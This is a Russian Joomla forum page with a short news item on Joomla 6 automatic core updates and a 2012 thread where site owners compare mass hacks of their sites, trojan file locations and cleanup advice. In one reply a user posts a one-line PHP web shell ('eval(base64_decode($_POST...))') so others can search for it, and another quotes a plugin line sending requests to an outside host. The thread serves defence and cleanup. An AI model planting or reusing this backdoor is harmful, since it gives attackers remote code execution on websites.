Новости Joomla

Joomla 6: Автоматические обновления ядра в Joomla

Joomla 6: Автоматические обновления ядра в Joomla

👩‍💻 Joomla 6: Автоматические обновления ядра в Joomla. В октябрьском номере официального журнала Joomla - Joomla Community Magazine вышла статья David Jardin, где рассказывается о внедрении функционала автоматического обновления ядра Joomla.❓Почему сейчас? Joomla же жила как-то 20 лет без автоматических обновлений?Это оказалась самая востребованная за последнее время от пользователей Joomla функция. Но, основная причина внедрения - проблемы безопасности. Всякий раз, когда в новой версии Joomla устраняется уязвимость, злоумышленники начинают анализировать код, чтобы выяснить, какая именно уязвимость была исправлена. И как только они это выясняют - начинается разработка автоматизированных скриптов для взлома как можно большего количества сайтов. Затем доступы к автоматически взломанным сайтам продаются в профильных чатах и ресурсах "пачками" по несколько сотен тысяч или миллионов сайтов. Ваш сайт могли взломать несколько лет назад, но воспользоваться уязвимостью могут не сразу, а тогда, когда у злоумышленников возникнет необходимость. И только после этого вы может быть узнаете об этом.Анализ патча, понимание проблемы и разработка скрипта требуют времени. И если владелец сайта не обновит его до истечения этого срока, сайт может быть взломан. А хакеры действуют быстро! Для критических, легко эксплуатируемых уязвимостей речь идёт о временном окне в 10–12 часов — и этого времени явно недостаточно, чтобы все успели обновить свои сайты.Здесь выходят на первый план автоматизированные обновления: проект Joomla теперь может активно устанавливать обновления (и, следовательно, исправления безопасности) на сайты, чтобы гарантировать, что сайты действительно обновляются вовремя.🕘 От первых идей до реализации прошло 5 лет. И здесь можно вспомнить, как в Joomla 5.1 внедрили TUF - The Update Framework, позволяющий устанавливать защищённое соединение между сайтом и сервером обновлений и исключает возможность supply chain attack (атаки на цепочку поставок).Об особенностях реализации и требованиях к сайту читаем подробнее в статье на JCM.@joomlafeed#joomla #secutiry #jcm

0 Пользователей и 1 Гость просматривают эту тему.
  • 53 Ответов
  • 16532 Просмотров
*

otto

  • Новичок
  • 6
  • 0 / 0
Re: Массовые взломы
« Ответ #30 : 21.01.2012, 12:44:07 »
Информация для размышления.
не так давно у меня взломали 3 сайта - в шаблон встроили около 20 ссылок на всякие смс-сервисы.. ладно думаю - сам виноват (пароль ftp хранил в клиенте, ну и так по поводу безопасности не слишком маньячил) через какое-то время заметил в панели явм рост входящих ссылок (по 50-100 за ап) все бы хорошо, но анкоры у ссылок все теже смс-сервисы (как выяснилось кроме ссылок в шаблон у меня в директории logs разместили минисайт - ссылки были на него) - налицо взлом ftp и при чем здесь Joomla... странность в том, что все взломанные сайты, с которых ведут ссылки (уже более 150) ВСЕ НА Joomla!
ps. версия жумлы на момент взлома (не утверждаю что взлом был именно Joomla) 1524, хостинг таймвеб, дополнения по минимуму и все с офсайтов (обновляются не регулярно, но обновляются)
*

Лат

  • Захожу иногда
  • 85
  • 19 / 6
  • Звоните 8 (905) 778-52-44
Re: Массовые взломы
« Ответ #31 : 21.01.2012, 13:48:06 »
См. подпись: "Домен за 99 рублей и надежный хостинг"  - может по этому?

проверьте права папок (644 должны быть) - я так делал но не помню на какие папки :(

Смотрю подпись. Домены от Reg.ru. Хостинг- свой сервер от fastvps за 3000р в месяц, у обратившихся клиентов— timeweb.ru, на нем кстати мои аккаунты пока нормально работают. Вы это вообще к чему сказали? Потроллить типа?

Права папок— все в порядке, я их не менял, я Joomla 7 лет занимаюсь и помню об этом.
*

tefun

  • Живу я здесь
  • 2540
  • 130 / 1
  • Легче всего обмануть себя
Re: Массовые взломы
« Ответ #32 : 21.01.2012, 14:07:22 »
пароль ftp хранил в клиенте, ну и так по поводу безопасности не слишком маньячил
я щас удалил все пароли в мозиле, файлзилле, короче все записал (они были конечно) но все равно ВСЕ нафиг поудалял!
то что постится на фОруме, не вырубается тапОрами
_______________________________________________
Мысли и женщины вместе не приходят М.Ж.
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Re: Массовые взломы
« Ответ #33 : 21.01.2012, 14:35:26 »
Да походу хостинги вскрывают на wordpress такая же каша просто сайтов на нем поменьше вот и шумиха меньше.(дрючат по всему мира причем один и тотже код закидывают) у меня часто ищут директорию usr вот лог
Спойлер
[свернуть]
Вот новую хня появилась а вчера уже и сюда с такой же бедой обратились
я себе в php.ini
Спойлер
[свернуть]
добавил
Спойлер
[свернуть]
плюс в haccess
Спойлер
[свернуть]

сейчас что то корректирую из htaccess от Nicholas K. Dionysopoulos
потихоньку добавляю себе
Спойлер
[свернуть]
вот как то так


p.s. обновленный .htaccess от Nicholas K. Dionysopoulos 
« Последнее редактирование: 30.01.2012, 19:38:08 от oriol »
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Re: Массовые взломы
« Ответ #34 : 21.01.2012, 14:46:19 »
я щас удалил все пароли в мозиле, файлзилле, короче все записал (они были конечно) но все равно ВСЕ нафиг поудалял!
Да бред все это есть перехватчики клавы уж усли в комп проникли то это пи............. так что можешь обратно сохранить
на почитай
*

tefun

  • Живу я здесь
  • 2540
  • 130 / 1
  • Легче всего обмануть себя
Re: Массовые взломы
« Ответ #35 : 21.01.2012, 14:52:47 »
Да бред все это есть перехватчики клавы уж усли в комп проникли то это пи............. так что можешь обратно сохранить
на почитай
спасибо! обязательно прочту...хотя уже щас вижу что нифига не пойму :(
Просто я сохранял пароли тк они имели след вид 6567fgghj43234rtyyu тоб НИКТО ваще не взломал :) знаю что если захотеть то обязательно взломают...терь упростил, но не сохраняю

Также считаю что оч важна версия Windos - тк  на XP были такие вирусы что ваще капец :o а на 7 тьфу тьфу тьфу вроде нет ^-^

ну а если тайплоггеры что ле? я вот думаю эл клаву использовать еще
то что постится на фОруме, не вырубается тапОрами
_______________________________________________
Мысли и женщины вместе не приходят М.Ж.
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Re: Массовые взломы
« Ответ #36 : 21.01.2012, 15:03:05 »
я вот думаю эл клаву использовать еще
А ты Винокуру не родственник ? )))))
Там пишут что перехватывают в сети (между пунктом А и Б)
*

ritm-it45

  • Захожу иногда
  • 63
  • 0 / 0
Re: Массовые взломы
« Ответ #37 : 21.01.2012, 18:08:57 »
у себя нашел такого троянчика: "PHP.Shell-AX[Trj]" (Avast)

у меня лежал здесь:
./components/com_ag_google_analytics2/index.php
./modules/mod_myblog_archive/
./includes/class.php

сохранил себе, надо будет разобрать
« Последнее редактирование: 21.01.2012, 18:13:48 от ritm-it45 »
*

Langoliers

  • Давно я тут
  • 621
  • 67 / 2
  • Если б Я изучал людей, то был бы паразитологом
Re: Массовые взломы
« Ответ #38 : 21.01.2012, 20:19:23 »
Ребят, ну когда же вы перейдете на *nix? Вирусы? Трояны? не, не слышал...
А из своего админского опыта скажу, что лучше правильно настроенной Авиры ничего нет (Internet Security).
А если брать бесплатные решения то Avira Personal и Outpost (есть бесплатный фаервол.
otto, сам виноват - пренебрежение элементарными правилами безопасности, а ломали только Joomla возможно для того, чтобы завести в заблуждение, чтобы решили, что ломали именно движки. И обновляться надо во время...
А еще можно на виртуалке работать... Поработал - снес, забыл. Пароли сохранил в голове.
Цитировать
у меня лежал здесь:
./components/com_ag_google_analytics2/index.php
А Вам нужен этот компонент? Трудно зайти на Google Analitycs и посмотреть статистику? Чем меньше расширений тем лучше. Сама по себе Joomla 1.5.25 очень хорошо защищена, конечно не без дыр, я думаю, но их не так как в старых версиях или в 1.7.
Просто мне кажется, что многие зря задают такие вопросы "меня взломали, что может быть? Я не знаю что делать"
А все элементарно:
Последняя версия Joomla. (лично я пока склоняюсь к 1.5.25) Изменение префикса базы данных с jos на любой другой. Чем меньше расширений - тем лучше. Посему, что можем - допиливаем руками. Зачем ставить целый модуль для кнопки "наверх" если это можно сделать парой строчек кода? Не знаете как? Пишите - Вам здесь помогут. У меня мощный портал есть, на котором всего 3 компонента включено - это Поиск, Контакты и Ссылки, а зачем больше то? Ну да пилил руками... Походу дела учился, но результат того стоит! Выбирайте надежный проверенный хостинг. Не ведитесь на "хостинг для Joomla за 99 рублей". Какой может быть хостинг для Joomla скажите мне? Она может работать и на апаче и на nginx и т.п. И тут влияет скорее скорость работы и возможности, но хостинга или VPS\VDS, а не Joomla. Откажитесь от вареза(!) лучше за работу получить на 1000руб меньше, чем потом ночи сидеть и все переделывать, или платить деньги за лечение. Перед тем как поставить расширение подумайте - а надо ли оно вам? Проверьте его на уязвимости, просто пролистав списки уязвимостей расширений на оф сайте уязвимостей Joomla. Если оно Вам больше не нужно не оставляйте его, можно конечно и выключить, но лучше удалить и проверить все ли файлы удалились.
И наконец следите за свой виндой. Ну или переходите на *nix или MAC если Вы дизайнер.
*

SmokerMan

  • Гуру
  • 5290
  • 720 / 26
Re: Массовые взломы
« Ответ #39 : 21.01.2012, 23:05:18 »
Langoliers
Прочиатал половину, дальше букав не осилил в целом политика ясна - Вы все ***ы, которые сами мне даете ключи, а потом плачитесь что у вас забрали печенько.
Будьте бдительны)))
*

Langoliers

  • Давно я тут
  • 621
  • 67 / 2
  • Если б Я изучал людей, то был бы паразитологом
Re: Массовые взломы
« Ответ #40 : 21.01.2012, 23:41:35 »
SmokerMan, в точку!
действительно, что то я распиразболтался не на шутку :)
*

tefun

  • Живу я здесь
  • 2540
  • 130 / 1
  • Легче всего обмануть себя
Re: Массовые взломы
« Ответ #41 : 21.01.2012, 23:49:45 »
И наконец следите за свой виндой
ВОТ С ЭТИМ НА ВСЕ 100 согласен!
то что постится на фОруме, не вырубается тапОрами
_______________________________________________
Мысли и женщины вместе не приходят М.Ж.
*

hedeag

  • Захожу иногда
  • 377
  • 23 / 3
Re: Массовые взломы
« Ответ #42 : 23.01.2012, 01:13:29 »
не взломан не один из 12 сайтов созданных мной, все висят на мультихосте(не реклама)
даже тех кто висит в топ1-3(рекламные места яндекса) не ломанули, дело не в Joomla а в вирусах в компе я так понимаю, у меня стоит аваст
ну и в раздаче этих кодов кому попало

узнал сегодня от знакомого что его ломанули сайт висит на best-hoster.ru   я зашел нашел 3000 вирусов  пичалька

вот думаю лечить и переводить к себе под крыло или не стоит?
вычитал что заражение идет через файл post.php  зарытый в фтп(чаще в папке images)


если у кого то он есть, выложите плз его код что бы искать другие файлы, ведь не все же на автомате засовывали пост, некоторые хакеры наверно переименовывали
« Последнее редактирование: 23.01.2012, 01:27:23 от hedeag »
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Re: Массовые взломы
« Ответ #43 : 23.01.2012, 10:06:17 »
если у кого то он есть, выложите плз его код ..........
Код
<?php eval(base64_decode($_POST["php"])); ?>
http://joomlaforum.ru/index.php/topic,197284.msg1041800.html#msg1041800
*

!eX

  • Новичок
  • 7
  • 0 / 0
Re: Массовые взломы
« Ответ #44 : 28.01.2012, 22:18:54 »
Подскажите, есть методы автоматического удаления такого кода, например скриптом, если есть подскажите.
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Re: Массовые взломы
« Ответ #45 : 28.01.2012, 22:23:33 »
Подскажите, есть методы автоматического удаления такого кода, например скриптом, если есть подскажите.
http://joomlaforum.ru/index.php/topic,197284.msg1043065.html#msg1043065
*

!eX

  • Новичок
  • 7
  • 0 / 0
Re: Массовые взломы
« Ответ #46 : 28.01.2012, 22:39:33 »
Благодарю за ссылку.
*

cult4

  • Осваиваюсь на форуме
  • 10
  • 0 / 0
Re: Массовые взломы
« Ответ #47 : 09.02.2012, 01:01:49 »
А я то думаю, что случилось. У меня хостинг на регру, поломали не только Joomla 1.5.25, но и одну из платных cms. Только сегодня долечил. Сидел как дурак вручную вычищал. Если бы не форум - еще бы 2 дня сидел.
*

MaxFarSeer

  • Захожу иногда
  • 384
  • 29 / 0
  • http://ru.ah.fm:80
Re: Массовые взломы
« Ответ #48 : 09.02.2012, 09:22:51 »
у знакомого тоже помимо жумлы еще modx попал под раздачу, правда только 1 файл
Не можете найти, где редактировать код? Читаем:
Быстрый и легкий поиск нужных файлов для редактирования чего-либо

Я много времени потратил на изменение готовых шаблонов, раскуривание чего и как там у буржуев, менял код вложенный в 100500 дивов, да они неплохи эти T3 и Warp (YOO), но стоит начать делать свой шаблон...Ребята!!! Всем советую! Свое - так легко настраивать!
*

WOOF

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Массовые взломы
« Ответ #49 : 29.03.2012, 22:22:16 »
Народ, помогайте.
Только на одной странице сайта http://kompanec.ru/index.php?option=com_formcalc&view=formcalc&formid=1&Itemid=24 появилась надпись:
Found
The document has moved here.
Apache/2.2.16 (Debian) Server at delashop.ru Port 80"

Пробовал искать Notepad++ по всему сайту на предмет eval и base64 - ничего. глушняк. По измененным файлам тоже ничего. В шаблоне все чисто, index.php в корне тоже нормален. В images никаких php. FTP отключил напрочь - есть прямой достп к серверу. Может кто подскажет, куда копать?
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Re: Массовые взломы
« Ответ #50 : 29.03.2012, 23:34:49 »
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Re: Массовые взломы
« Ответ #51 : 30.03.2012, 21:02:47 »
попробовал просто поискать по "MD5" - ничего похожего не нашел. Статью просмотрел, но ведь MD5 встречается и в мирных целях- пароли пользователей. И потом, когда удалил полностью компонент и плагин, которые выводят конкретно эту страницу и даже руками вычистил папки, осталась только эта надпись, то есть генерируется она откуда-то еще. НО! Больше нигде этой надписи нет. :(

plg_formcalc_1.5\formcalc.php   строка 119

Функция
ob_start(); 

дальше   строка    143
$host = "delashop.ru/host.php?"; 

короче копай там

Вот мне не понятно если качал с оф сайта то нах им это надо ?
Или не с оф сайта ?
*

WOOF

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Массовые взломы
« Ответ #52 : 30.03.2012, 21:19:15 »
plg_formcalc_1.5\formcalc.php   строка 119

Функция
ob_start();  

дальше   строка    143
$host = "delashop.ru/host.php?";

короче копай там

Вот мне не понятно если качал с оф сайта то нах им это надо ?
Или не с оф сайта ?


Качал с официального: http://delajoom.ru/index.php/o-komponente-formcalc
Кстати, у них на какой-то странице эта фигня тоже есть. Написал их админу в аську - молчит

Закомментировал весь этот блок - не помогло.
« Последнее редактирование: 30.03.2012, 21:25:56 от WOOF »
*

WOOF

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Массовые взломы
« Ответ #53 : 05.04.2012, 12:25:36 »
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Частые взломы сайта

Автор VIPERR37

Ответов: 3
Просмотров: 995
Последний ответ 25.02.2017, 00:52:38
от stopvirusby
Безопасность Joomla (Взломы - причины и следствия)

Автор Craze

Ответов: 23
Просмотров: 3952
Последний ответ 17.09.2015, 09:23:20
от wishlight
Предновогодние взломы

Автор wishlight

Ответов: 8
Просмотров: 1967
Последний ответ 22.01.2013, 15:41:56
от flyingspook
wso, america, шелл, очистка логов, отвественность за взломы..

Автор danik.html

Ответов: 5
Просмотров: 2882
Последний ответ 02.06.2012, 23:20:31
от flyingspook